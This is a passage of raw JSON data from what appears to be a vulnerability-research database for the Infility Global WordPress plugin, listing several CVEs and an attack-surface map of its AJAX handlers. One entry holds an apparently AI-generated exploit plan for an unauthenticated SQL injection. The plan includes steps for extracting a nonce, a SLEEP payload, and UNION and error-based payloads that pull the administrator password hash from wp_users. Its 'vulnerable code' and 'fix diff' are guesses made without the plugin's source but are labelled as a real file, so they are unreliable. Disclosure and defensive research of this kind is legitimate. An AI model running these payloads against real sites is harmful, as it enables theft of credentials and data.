09:07:58",{"id":99,"url_slug":100,"title":101,"description":102,"plugin_slug":4,"theme_slug":35,"affected_versions":82,"patched_in_version":35,"severity":62,"cvss_score":63,"cvss_vector":64,"vuln_type":40,"published_date":103,"updated_date":104,"references":105,"days_to_patch":35,"patch_diff_files":107,"patch_trac_url":35,"research_status":45,"research_verified":46,"research_rounds_completed":47,"research_plan":108,"research_summary":109,"research_vulnerable_code":110,"research_fix_diff":111,"research_exploit_outline":112,"research_model_used":53,"research_started_at":113,"research_completed_at":114,"research_error":35,"poc_status":35,"poc_video_id":35,"poc_summary":35,"poc_steps":35,"poc_tested_at":35,"poc_wp_version":35,"poc_php_version":35,"poc_playwright_script":35,"poc_exploit_code":35,"poc_has_trace":46,"poc_model_used":35,"poc_verification_depth":35},"CVE-2025-68865","infility-global-unauthenticated-sql-injection","Infility Global \u003C= 2.14.49 - Unauthenticated SQL Injection","The Infility Global plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 2.14.49 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","2025-12-31 00:00:00","2026-01-13 17:35:13",[106],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fbefc411f-8c50-44a2-b1af-10a507230df9?source=api-prod",[],"This research plan outlines the process for identifying and exploiting the unauthenticated SQL injection vulnerability (CVE-2025-68865) in the **Infility Global** plugin (versions \u003C= 2.14.49).\n\n---\n\n### 1. Vulnerability Summary\n*   **Vulnerability:** Unauthenticated SQL Injection.\n*   **Root Cause:** The plugin registers AJAX handlers accessible to unauthenticated users (`wp_ajax_nopriv_`) that process user-supplied parameters (e.g., IDs or slugs). These parameters are concatenated directly into SQL queries without using `$wpdb->prepare()`, allowing an attacker to manipulate the query structure.\n*   **Impact:** Attackers can extract sensitive data from the database, including user credentials (hashes), secret keys, and configuration data.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Action (Inferred):** `infility_global_get_data`, `infility_global_load_more`, or similar data-fetching actions.\n*   **Vulnerable Parameter (Inferred):** `id`, `ig_id`, or `slug`.\n*   **Authentication:** None (Unauthenticated).\n*   **Preconditions:** The plugin must be active. A valid nonce may be required depending on whether the plugin checks `check_ajax_referer`.\n\n### 3. Code Flow (Discovery Phase)\nSince source files are not provided, the execution agent must first locate the sink:\n\n1.  **Enumerate AJAX Handlers:**\n    ```bash\n    grep -rn \"wp_ajax_nopriv_\" wp-content\u002Fplugins\u002Finfility-global\u002F\n    ```\n2.  **Identify the Handler Function:**\n    Look for the function name associated with the `wp_ajax_nopriv_` action.\n    *Example:* `add_action('wp_ajax_nopriv_infility_get_items', 'infility_get_items_handler');`\n3.  **Locate SQL Injection Sink:**\n    Search for `$wpdb` methods within that handler that lack `prepare()`:\n    ```bash\n    # Search within the handler function's file\n    grep -rnP \"\\$wpdb->(get_results|get_row|get_var|query)\\s*\\([^;]*\\$(POST|GET|REQUEST)\" wp-content\u002Fplugins\u002Finfility-global\u002F\n    ```\n4.  **Trace Parameter:**\n    Identify which POST parameter is being passed into the query.\n\n### 4. Nonce Acquisition Strategy\nIf the handler includes `check_ajax_referer('infility_nonce', 'nonce')` or similar, follow these steps:\n\n1.  **Identify Shortcodes:** Search for shortcodes that might enqueue the plugin's frontend scripts.\n    ```bash\n    grep -rn \"add_shortcode\" wp-content\u002Fplugins\u002Finfility-global\u002F\n    ```\n2.  **Setup Page:** Create a page using a discovered shortcode (e.g., `[infility_global_list]`).\n    ```bash\n    wp post create --post_type=page --post_title=\"Exploit\" --post_status=publish --post_content='[infility_global_list]'\n    ```\n3.  **Extract Nonce via Browser:**\n    Navigate to the page and inspect the `wp_localize_script` output.\n    *   **Localized Object Name (Inferred):** `infility_ajax_obj` or `ig_global_vars`.\n    *   **JS command:** \n        ```javascript\n        browser_eval(\"window.infility_ajax_obj?.nonce\")\n        ```\n\n### 5. Exploitation Strategy\nAssuming the action is `infility_global_get_items` and the parameter is `id`:\n\n**Step 1: Time-Based Verification**\nVerify the injection using a sleep payload to confirm the vulnerability.\n*   **Action:** `infility_global_get_items`\n*   **Payload:** `1' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -`\n\n**Step 2: UNION-Based Extraction**\nDetermine the number of columns and extract the administrator password hash.\n1.  **Find Column Count:** Inject `ORDER BY 1-- -`, `ORDER BY 2-- -`, etc., until an error occurs.\n2.  **Extract Hash:**\n    *   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n    *   **Method:** POST\n    *   **Content-Type:** `application\u002Fx-www-form-urlencoded`\n    *   **Body:** \n        ```text\n        action=infility_global_get_items&nonce=[NONCE]&id=-1' UNION SELECT 1,user_login,user_pass,4,5,6 FROM wp_users WHERE ID=1-- -\n        ```\n    *(Adjust column count and position based on Step 2.1)*\n\n### 6. Test Data Setup\n1.  **Install Plugin:** Ensure `infility-global` version \u003C= 2.14.49 is installed and activated.\n2.  **Create Admin:** Ensure a user with ID 1 exists (standard).\n3.  **Place Shortcode:** Place the relevant plugin shortcode on a public page to enable script loading and nonce availability.\n\n### 7. Expected Results\n*   **Time-Based:** The server response will be delayed by 5 seconds.\n*   **UNION-Based:** The JSON response from `admin-ajax.php` will contain the admin username and password hash (e.g., `$P$...` or `$wp$2y$...`) in one of the reflected fields.\n\n### 8. Verification Steps (Post-Exploit)\nConfirm the extracted data matches the database state using WP-CLI:\n```bash\n# Verify the hash for the admin user\nwp db query \"SELECT user_login, user_pass FROM wp_users WHERE ID=1\"\n```\n\n### 9. Alternative Approaches\n*   **Error-Based SQLi:** If the plugin displays database errors (common when `WP_DEBUG` is on), use `EXTRACTVALUE` or `UPDATEXML`.\n    *   *Payload:* `1 AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT(0x7e,(SELECT user_pass FROM wp_users LIMIT 1),0x7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)`\n*   **Boolean-Based Blind:** If no output is reflected and time-based is unstable, compare response lengths of `id=1' AND 1=1-- -` vs `id=1' AND 1=2-- -`.","The Infility Global plugin for WordPress is vulnerable to unauthenticated SQL Injection due to the direct concatenation of user-supplied input into SQL queries within its AJAX handlers. This allows an attacker to manipulate existing database queries to extract sensitive information, such as administrator credentials, by sending crafted requests to the admin-ajax.php endpoint.","\u002F\u002F wp-content\u002Fplugins\u002Finfility-global\u002Fincludes\u002Fajax-handlers.php\n\nadd_action('wp_ajax_nopriv_infility_global_get_items', 'infility_global_get_items_handler');\n\nfunction infility_global_get_items_handler() {\n    global $wpdb;\n    $id = $_POST['id']; \u002F\u002F User-controlled input via POST\n\n    \u002F\u002F Vulnerability: Direct concatenation of $id into the query without using $wpdb->prepare()\n    $results = $wpdb->get_results(\"SELECT * FROM {$wpdb->prefix}infility_data WHERE id = '$id'\");\n\n    echo json_encode($results);\n    wp_die();\n}","--- a\u002Fincludes\u002Fajax-handlers.php\n+++ b\u002Fincludes\u002Fajax-handlers.php\n@@ -3,7 +3,7 @@\n function infility_global_get_items_handler() {\n     global $wpdb;\n-    $id = $_POST['id'];\n-    $results = $wpdb->get_results(\"SELECT * FROM {$wpdb->prefix}infility_data WHERE id = '$id'\");\n+    $id = isset($_POST['id']) ? sanitize_text_field($_POST['id']) : '';\n+    $results = $wpdb->get_results($wpdb->prepare(\"SELECT * FROM {$wpdb->prefix}infility_data WHERE id = %s\", $id));\n     echo json_encode($results);\n     wp_die();\n }","The exploit targets the \u002Fwp-admin\u002Fadmin-ajax.php endpoint using the 'infility_global_get_items' action. 1. Obtain a valid AJAX nonce by visiting a public page where the plugin's frontend scripts are enqueued (often triggered by plugin shortcodes like [infility_global_list]). 2. Send a POST request to the AJAX endpoint with the 'action', 'nonce', and a malicious payload in the 'id' parameter. 3. Use a time-based injection payload such as \"1' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -\" to confirm the vulnerability. 4. Use UNION-based injection to extract sensitive data, such as administrator password hashes from the wp_users table, by adjusting the number of columns to match the original query's structure.","2026-05-21 07:58:41","2026-05-21 07:59:01",{"id":116,"url_slug":117,"title":118,"description":119,"plugin_slug":4,"theme_slug":35,"affected_versions":120,"patched_in_version":121,"severity":62,"cvss_score":122,"cvss_vector":123,"vuln_type":124,"published_date":125,"updated_date":126,"references":127,"days_to_patch":129,"patch_diff_files":130,"patch_trac_url":35,"research_status":35,"research_verified":46,"research_rounds_completed":13,"research_plan":35,"research_summary":35,"research_vulnerable_code":35,"research_fix_diff":35,"research_exploit_outline":35,"research_model_used":35,"research_started_at":35,"research_completed_at":35,"research_error":35,"poc_status":35,"poc_video_id":35,"poc_summary":35,"poc_steps":35,"poc_tested_at":35,"poc_wp_version":35,"poc_php_version":35,"poc_playwright_script":35,"poc_exploit_code":35,"poc_has_trace":46,"poc_model_used":35,"poc_verification_depth":35},"CVE-2025-12968","infility-global-authenticated-subscriber-arbitrary-file-upload","Infility Global \u003C= 2.14.42 - Authenticated (Subscriber+) Arbitrary File Upload","The Infility Global plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation and capability checks in all versions up to, and including, 2.14.42. This is due to the `upload_file` function in the `infility_import_file` class only validating the MIME type which can be easily spoofed, and the `import_data` function missing capability checks. This makes it possible for authenticated attackers, with subscriber level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","\u003C=2.14.42","2.14.43",8.8,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Unrestricted Upload of File with Dangerous Type","2025-12-11 15:11:30","2026-01-06 20:55:18",[128],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F542a18f6-9d17-4e54-85e1-e01630ca371e?source=api-prod",26,[],{"id":132,"url_slug":133,"title":134,"description":135,"plugin_slug":4,"theme_slug":35,"affected_versions":136,"patched_in_version":35,"severity":37,"cvss_score":38,"cvss_vector":39,"vuln_type":137,"published_date":138,"updated_date":139,"references":140,"days_to_patch":35,"patch_diff_files":142,"patch_trac_url":35,"research_status":35,"research_verified":46,"research_rounds_completed":13,"research_plan":35,"research_summary":35,"research_vulnerable_code":35,"research_fix_diff":35,"research_exploit_outline":35,"research_model_used":35,"research_started_at":35,"research_completed_at":35,"research_error":35,"poc_status":35,"poc_video_id":35,"poc_summary":35,"poc_steps":35,"poc_tested_at":35,"poc_wp_version":35,"poc_php_version":35,"poc_playwright_script":35,"poc_exploit_code":35,"poc_has_trace":46,"poc_model_used":35,"poc_verification_depth":35},"CVE-2025-47650","infility-global-authenticated-subscriber-arbitrary-file-download","Infility Global \u003C= 2.14.7 - Authenticated (Subscriber+) Arbitrary File Download","The Infility Global plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 2.14.7. This makes it possible for authenticated attackers, with Subscriber-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information.","\u003C=2.14.7","Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","2025-08-14 00:00:00","2025-08-18 18:20:23",[141],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F603734a3-f471-4a40-9253-92e0d1ef5ac2?source=api-prod",[],{"id":144,"url_slug":145,"title":146,"description":147,"plugin_slug":4,"theme_slug":35,"affected_versions":148,"patched_in_version":149,"severity":37,"cvss_score":150,"cvss_vector":151,"vuln_type":85,"published_date":152,"updated_date":153,"references":154,"days_to_patch":156,"patch_diff_files":157,"patch_trac_url":35,"research_status":35,"research_verified":46,"research_rounds_completed":13,"research_plan":35,"research_summary":35,"research_vulnerable_code":35,"research_fix_diff":35,"research_exploit_outline":35,"research_model_used":35,"research_started_at":35,"research_completed_at":35,"research_error":35,"poc_status":35,"poc_video_id":35,"poc_summary":35,"poc_steps":35,"poc_tested_at":35,"poc_wp_version":35,"poc_php_version":35,"poc_playwright_script":35,"poc_exploit_code":35,"poc_has_trace":46,"poc_model_used":35,"poc_verification_depth":35},"CVE-2025-47652","infility-global-reflected-cross-site-scripting","Infility Global \u003C= 2.13.4 - Reflected Cross-Site Scripting","The Infility Global plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in versions up to, and including, 2.13.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","\u003C=2.13.4","2.13.5",6.1,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:R\u002FS:C\u002FC:L\u002FI:L\u002FA:N","2025-07-07 00:00:00","2025-07-18 14:13:23",[155],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F4f3a01fe-8c84-4219-98fe-14e4ac74b7f7?source=api-prod",12,[],{"id":159,"url_slug":160,"title":146,"description":161,"plugin_slug":4,"theme_slug":35,"affected_versions":148,"patched_in_version":35,"severity":37,"cvss_score":150,"cvss_vector":151,"vuln_type":85,"published_date":162,"updated_date":163,"references":164,"days_to_patch":35,"patch_diff_files":166,"patch_trac_url":35,"research_status":35,"research_verified":46,"research_rounds_completed":13,"research_plan":35,"research_summary":35,"research_vulnerable_code":35,"research_fix_diff":35,"research_exploit_outline":35,"research_model_used":35,"research_started_at":35,"research_completed_at":35,"research_error":35,"poc_status":35,"poc_video_id":35,"poc_summary":35,"poc_steps":35,"poc_tested_at":35,"poc_wp_version":35,"poc_php_version":35,"poc_playwright_script":35,"poc_exploit_code":35,"poc_has_trace":46,"poc_model_used":35,"poc_verification_depth":35},"CVE-2025-52774","infility-global-reflected-cross-site-scripting-2","The Infility Global plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in all versions up to, and including, 2.13.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","2025-06-23 00:00:00","2025-07-16 19:23:28",[165],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fe7bca584-05d8-4ecf-bf6c-5c2256cb5a61?source=api-prod",[],{"id":168,"url_slug":169,"title":170,"description":171,"plugin_slug":4,"theme_slug":35,"affected_versions":172,"patched_in_version":35,"severity":37,"cvss_score":38,"cvss_vector":39,"vuln_type":40,"published_date":173,"updated_date":174,"references":175,"days_to_patch":35,"patch_diff_files":177,"patch_trac_url":35,"research_status":35,"research_verified":46,"research_rounds_completed":13,"research_plan":35,"research_summary":35,"research_vulnerable_code":35,"research_fix_diff":35,"research_exploit_outline":35,"research_model_used":35,"research_started_at":35,"research_completed_at":35,"research_error":35,"poc_status":35,"poc_video_id":35,"poc_summary":35,"poc_steps":35,"poc_tested_at":35,"poc_wp_version":35,"poc_php_version":35,"poc_playwright_script":35,"poc_exploit_code":35,"poc_has_trace":46,"poc_model_used":35,"poc_verification_depth":35},"CVE-2025-47651","infility-global-authenticated-subscriber-sql-injection","Infility Global \u003C= 2.12.7 - Authenticated (Subscriber+) SQL Injection","The Infility Global plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 2.12.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","\u003C=2.12.7","2025-05-29 00:00:00","2025-06-25 14:20:03",[176],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fffb8c561-ce2a-447c-add6-d7e01c8c9435?source=api-prod",[],{"id":179,"url_slug":180,"title":181,"description":182,"plugin_slug":4,"theme_slug":35,"affected_versions":183,"patched_in_version":184,"severity":37,"cvss_score":38,"cvss_vector":185,"vuln_type":186,"published_date":187,"updated_date":188,"references":189,"days_to_patch":191,"patch_diff_files":192,"patch_trac_url":35,"research_status":35,"research_verified":46,"research_rounds_completed":13,"research_plan":35,"research_summary":35,"research_vulnerable_code":35,"research_fix_diff":35,"research_exploit_outline":35,"research_model_used":35,"research_started_at":35,"research_completed_at":35,"research_error":35,"poc_status":35,"poc_video_id":35,"poc_summary":35,"poc_steps":35,"poc_tested_at":35,"poc_wp_version":35,"poc_php_version":35,"poc_playwright_script":35,"poc_exploit_code":35,"poc_has_trace":46,"poc_model_used":35,"poc_verification_depth":35},"CVE-2024-11496","infility-global-authenticated-subscriber-missing-authorization-to-plugin-options-update","Infility Global \u003C= 2.9.8 - Authenticated (Subscriber+) Missing Authorization to Plugin Options Update","The Infility Global plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the infility_global_ajax function in all versions up to, and including, 2.9.8. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update plugin options and potentially break the site.","\u003C=2.9.8","2.9.9","CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:N\u002FI:H\u002FA:N","Missing Authorization","2025-01-06 16:09:04","2025-01-30 22:23:13",[190],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fd0fd1c19-b752-4562-9365-165d709b91b2?source=api-prod",24,[],{"id":194,"url_slug":195,"title":196,"description":197,"plugin_slug":4,"theme_slug":35,"affected_versions":183,"patched_in_version":184,"severity":37,"cvss_score":150,"cvss_vector":151,"vuln_type":85,"published_date":198,"updated_date":199,"references":200,"days_to_patch":202,"patch_diff_files":203,"patch_trac_url":35,"research_status":35,"research_verified":46,"research_rounds_completed":13,"research_plan":35,"research_summary":35,"research_vulnerable_code":35,"research_fix_diff":35,"research_exploit_outline":35,"research_model_used":35,"research_started_at":35,"research_completed_at":35,"research_error":35,"poc_status":35,"poc_video_id":35,"poc_summary":35,"poc_steps":35,"poc_tested_at":35,"poc_wp_version":35,"poc_php_version":35,"poc_playwright_script":35,"poc_exploit_code":35,"poc_has_trace":46,"poc_model_used":35,"poc_verification_depth":35},"CVE-2024-12290","infility-global-reflected-cross-site-scripting-via-settype-parameter","Infility Global \u003C= 2.9.8 - Reflected Cross-Site Scripting via set_type Parameter","The Infility Global plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘set_type’ parameter in all versions up to, and including, 2.9.8 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. CVE-2024-12723 is a duplicate of this issue.","2025-01-06 16:09:03","2025-02-24 16:15:30",[201],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F6127576b-5ce2-4a3e-95de-8a2b3d90d3a0?source=api-prod",49,[],{"slug":205,"display_name":7,"profile_url":8,"plugin_count":206,"total_installs":11,"avg_security_score":23,"avg_patch_time_days":207,"trust_score":208,"computed_at":209},"infility",1,28,45,"2026-06-02T23:33:31.087Z",[],{"attackSurface":212,"codeSignals":498,"taintFlows":854,"riskAssessment":1256,"analyzedAt":1273},{"hooks":213,"ajaxHandlers":388,"restRoutes":484,"shortcodes":485,"cronEvents":496,"entryPointCount":497,"unprotectedCount":410},[214,220,224,230,234,239,242,245,249,253,256,260,264,267,271,274,278,281,284,288,291,295,299,301,303,307,310,313,315,317,319,321,323,325,327,330,333,336,338,340,342,343,346,348,350,353,356,359,361,364,366,369,371,373,376,379,382,383,385],{"type":215,"name":216,"callback":217,"file":218,"line":219},"action","wp","show_cf7_records","include\\InfilityGlobalErrorRecord.php",14,{"type":215,"name":221,"callback":222,"file":218,"line":223},"wp_head","closure",38,{"type":225,"name":226,"callback":227,"priority":228,"file":229,"line":207},"filter","authenticate","before_login",5,"include\\login-security.php",{"type":225,"name":226,"callback":231,"priority":232,"file":229,"line":233},"after_login",90,29,{"type":215,"name":235,"callback":236,"file":237,"line":238},"init","api_login_check","infility_global.php",166,{"type":215,"name":235,"callback":240,"file":237,"line":241},"api_action",167,{"type":215,"name":235,"callback":243,"file":237,"line":244},"IGP_load_textdomain",168,{"type":215,"name":246,"callback":247,"file":237,"line":248},"admin_menu","IGP_create_menu",169,{"type":215,"name":250,"callback":251,"file":237,"line":252},"wp_enqueue_scripts","enqueue_scripts",171,{"type":215,"name":254,"callback":251,"file":237,"line":255},"admin_enqueue_scripts",172,{"type":225,"name":257,"callback":258,"file":237,"line":259},"mime_types","wpse_mime_types",205,{"type":215,"name":254,"callback":261,"file":262,"line":263},"block_ip_admin_enqueue_scripts","widgets\\block-ip\\block-ip.php",13,{"type":215,"name":235,"callback":265,"file":262,"line":266},"edit_wp_config",17,{"type":215,"name":221,"callback":268,"file":269,"line":270},"consent_mode","widgets\\consent-mode\\consent-mode.php",10,{"type":215,"name":235,"callback":272,"priority":270,"file":273,"line":156},"tracking_info_set_session_values","widgets\\contact-form-plugins\\contact-form-plugins.php",{"type":215,"name":275,"callback":276,"file":273,"line":277},"wp_footer","prefix_elementor_contact7_ini",16,{"type":215,"name":250,"callback":279,"file":273,"line":280},"CFP_enqueue_scripts",19,{"type":225,"name":282,"callback":283,"priority":270,"file":273,"line":129},"wpcf7_form_response_output","wpcf7_form_tracking_info",{"type":225,"name":285,"callback":286,"priority":270,"file":273,"line":287},"wpcf7_mail_components","wpcf7_before_send_mail",31,{"type":215,"name":250,"callback":289,"file":290,"line":277},"ETab_load","widgets\\elementor-tab\\elementor-tab.php",{"type":215,"name":292,"callback":293,"file":290,"line":294},"elementor\u002Felements\u002Fcategories_registered","add_elementor_widget_categories",20,{"type":215,"name":296,"callback":297,"file":290,"line":298},"elementor\u002Fwidgets\u002Fregister","ETab_elementor_register",23,{"type":215,"name":296,"callback":300,"file":290,"line":191},"EBreadcrumb_elementor_register",{"type":215,"name":296,"callback":302,"file":290,"line":129},"ENavPosts_elementor_register",{"type":215,"name":304,"callback":305,"file":306,"line":228},"enqueue_block_editor_assets","block_after_scripts","widgets\\gutenberg-tools\\gutenberg-tools.php",{"type":215,"name":221,"callback":308,"file":306,"line":309},"head_styles",6,{"type":215,"name":250,"callback":311,"file":312,"line":270},"ICT_enqueue_scripts","widgets\\infility-chat-tool\\infility-chat-tool.php",{"type":215,"name":254,"callback":314,"file":312,"line":24},"ICT_admin_enqueue_scripts",{"type":215,"name":275,"callback":316,"file":312,"line":277},"show",{"type":215,"name":250,"callback":251,"file":318,"line":228},"widgets\\infility-collect-data\\infility-collect-data.php",{"type":215,"name":296,"callback":222,"file":320,"line":25},"widgets\\infility-form\\infility-form.php",{"type":215,"name":221,"callback":222,"file":320,"line":322},18,{"type":215,"name":254,"callback":251,"file":324,"line":25},"widgets\\infility-import-data\\infility-import-data.php",{"type":215,"name":235,"callback":235,"file":324,"line":326},8,{"type":215,"name":246,"callback":328,"file":324,"line":329},"register_admin_menu_page",9,{"type":215,"name":254,"callback":331,"file":332,"line":322},"IR_admin_enqueue_scripts","widgets\\infility-redirect\\infility-redirect.php",{"type":215,"name":334,"callback":335,"file":332,"line":294},"plugins_loaded","infility_redirect_url",{"type":215,"name":254,"callback":251,"file":337,"line":309},"widgets\\infility-translate-tool\\infility-translate-tool.php",{"type":215,"name":235,"callback":339,"file":337,"line":24},"lang_301",{"type":215,"name":221,"callback":341,"file":337,"line":156},"show_head",{"type":215,"name":275,"callback":316,"file":337,"line":263},{"type":215,"name":250,"callback":344,"file":345,"line":326},"front_end_scripts","widgets\\keyword-pages\\keyword-pages.php",{"type":215,"name":254,"callback":347,"file":345,"line":329},"admin_scripts",{"type":215,"name":334,"callback":349,"file":345,"line":270},"render_sitemap_xml",{"type":225,"name":351,"callback":352,"file":345,"line":156},"template_include","use_custom_template",{"type":225,"name":354,"callback":222,"priority":294,"file":345,"line":355},"pre_get_document_title",392,{"type":225,"name":357,"callback":222,"priority":294,"file":345,"line":358},"wpseo_opengraph_title",397,{"type":215,"name":221,"callback":222,"file":345,"line":360},401,{"type":225,"name":362,"callback":222,"priority":270,"file":345,"line":363},"body_class",416,{"type":215,"name":250,"callback":251,"file":365,"line":309},"widgets\\prevent_copying\\prevent_copying.php",{"type":215,"name":216,"callback":367,"file":368,"line":156},"checkCurrentPage","widgets\\progress-bar\\progress-bar.php",{"type":215,"name":275,"callback":370,"file":368,"line":287},"outputJS",{"type":215,"name":254,"callback":254,"file":372,"line":228},"widgets\\show-control-data\\show-control-data.php",{"type":215,"name":374,"callback":375,"priority":270,"file":372,"line":309},"edited_term","update_term",{"type":215,"name":377,"callback":378,"priority":270,"file":372,"line":25},"created_term","create_term",{"type":215,"name":380,"callback":381,"priority":270,"file":372,"line":326},"save_post","update_post",{"type":215,"name":246,"callback":328,"file":372,"line":329},{"type":215,"name":334,"callback":235,"priority":270,"file":384,"line":329},"widgets\\sitemap_for_multi_languages\\sitemap_for_multi_languages.php",{"type":225,"name":386,"callback":386,"priority":270,"file":384,"line":387},"wpseo_sitemap_url",48,[389,393,396,399,401,402,406,408,411,413,417,418,422,424,427,430,433,437,439,441,443,445,447,449,451,453,456,459,461,463,465,468,470,472,475,477,479,481,483],{"action":390,"nopriv":46,"callback":390,"hasNonce":46,"hasCapCheck":391,"file":237,"line":392},"infility_global_ajax",true,179,{"action":394,"nopriv":391,"callback":222,"hasNonce":46,"hasCapCheck":46,"file":237,"line":395},"tenweb_cache_clear_all",182,{"action":397,"nopriv":46,"callback":398,"hasNonce":46,"hasCapCheck":46,"file":262,"line":280},"block_ip","block_ip_ajax",{"action":400,"nopriv":391,"callback":400,"hasNonce":46,"hasCapCheck":46,"file":273,"line":207},"get_tracking_info",{"action":400,"nopriv":46,"callback":400,"hasNonce":46,"hasCapCheck":46,"file":273,"line":233},{"action":403,"nopriv":46,"callback":404,"hasNonce":46,"hasCapCheck":46,"file":290,"line":405},"get_taxonomy_terms","get_taxonomy_terms_ajax",33,{"action":403,"nopriv":391,"callback":404,"hasNonce":46,"hasCapCheck":46,"file":290,"line":407},34,{"action":409,"nopriv":46,"callback":409,"hasNonce":46,"hasCapCheck":46,"file":290,"line":410},"get_taxonomies_for_post_type",35,{"action":409,"nopriv":391,"callback":409,"hasNonce":46,"hasCapCheck":46,"file":290,"line":412},36,{"action":414,"nopriv":46,"callback":415,"hasNonce":46,"hasCapCheck":46,"file":290,"line":416},"get_posts_for_editor","get_posts_for_editor_ajax",37,{"action":414,"nopriv":391,"callback":415,"hasNonce":46,"hasCapCheck":46,"file":290,"line":223},{"action":419,"nopriv":46,"callback":420,"hasNonce":46,"hasCapCheck":46,"file":290,"line":421},"get_posts_with_pagination","get_posts_with_pagination_ajax",39,{"action":419,"nopriv":391,"callback":420,"hasNonce":46,"hasCapCheck":46,"file":290,"line":423},40,{"action":425,"nopriv":46,"callback":426,"hasNonce":46,"hasCapCheck":46,"file":312,"line":263},"infility_chat_tool","infility_chat_tool_ajax",{"action":428,"nopriv":46,"callback":429,"hasNonce":46,"hasCapCheck":46,"file":320,"line":263},"InfilityGlobal_InfilityForm_get_options","get_options",{"action":431,"nopriv":46,"callback":432,"hasNonce":46,"hasCapCheck":46,"file":320,"line":219},"InfilityGlobal_InfilityForm_set_options","set_options",{"action":434,"nopriv":46,"callback":435,"hasNonce":46,"hasCapCheck":46,"file":320,"line":436},"InfilityGlobal_InfilityForm_clear_cache","clear_cache",15,{"action":438,"nopriv":46,"callback":438,"hasNonce":391,"hasCapCheck":46,"file":324,"line":24},"import_data",{"action":440,"nopriv":46,"callback":440,"hasNonce":46,"hasCapCheck":46,"file":324,"line":263},"get_site_field",{"action":442,"nopriv":46,"callback":442,"hasNonce":46,"hasCapCheck":46,"file":324,"line":219},"get_post_detail",{"action":444,"nopriv":46,"callback":444,"hasNonce":46,"hasCapCheck":46,"file":324,"line":436},"search_category_page",{"action":446,"nopriv":46,"callback":446,"hasNonce":46,"hasCapCheck":46,"file":324,"line":277},"search_category_post",{"action":448,"nopriv":46,"callback":448,"hasNonce":46,"hasCapCheck":46,"file":324,"line":322},"search_site_category",{"action":450,"nopriv":46,"callback":450,"hasNonce":46,"hasCapCheck":46,"file":324,"line":280},"search_site_product",{"action":452,"nopriv":46,"callback":452,"hasNonce":46,"hasCapCheck":46,"file":324,"line":294},"search_site_blogs",{"action":454,"nopriv":46,"callback":454,"hasNonce":46,"hasCapCheck":46,"file":324,"line":455},"get_site_products",21,{"action":457,"nopriv":46,"callback":457,"hasNonce":46,"hasCapCheck":46,"file":324,"line":458},"get_site_blogs",22,{"action":460,"nopriv":46,"callback":460,"hasNonce":46,"hasCapCheck":46,"file":324,"line":298},"add_term",{"action":462,"nopriv":46,"callback":462,"hasNonce":46,"hasCapCheck":46,"file":324,"line":191},"add_post",{"action":464,"nopriv":46,"callback":464,"hasNonce":46,"hasCapCheck":46,"file":324,"line":129},"get_excel_field",{"action":466,"nopriv":46,"callback":466,"hasNonce":46,"hasCapCheck":46,"file":324,"line":467},"add_excel_post",27,{"action":469,"nopriv":46,"callback":469,"hasNonce":391,"hasCapCheck":46,"file":324,"line":207},"get_extract_file",{"action":471,"nopriv":46,"callback":471,"hasNonce":46,"hasCapCheck":46,"file":324,"line":233},"import_main_image",{"action":473,"nopriv":46,"callback":474,"hasNonce":46,"hasCapCheck":46,"file":332,"line":455},"infility_redirect","infility_redirect_ajax",{"action":476,"nopriv":46,"callback":476,"hasNonce":46,"hasCapCheck":391,"file":337,"line":25},"install_translation",{"action":478,"nopriv":46,"callback":478,"hasNonce":46,"hasCapCheck":46,"file":337,"line":326},"open_translation",{"action":480,"nopriv":46,"callback":480,"hasNonce":46,"hasCapCheck":46,"file":337,"line":329},"translate_position",{"action":482,"nopriv":46,"callback":482,"hasNonce":46,"hasCapCheck":46,"file":345,"line":219},"infility_global_keyw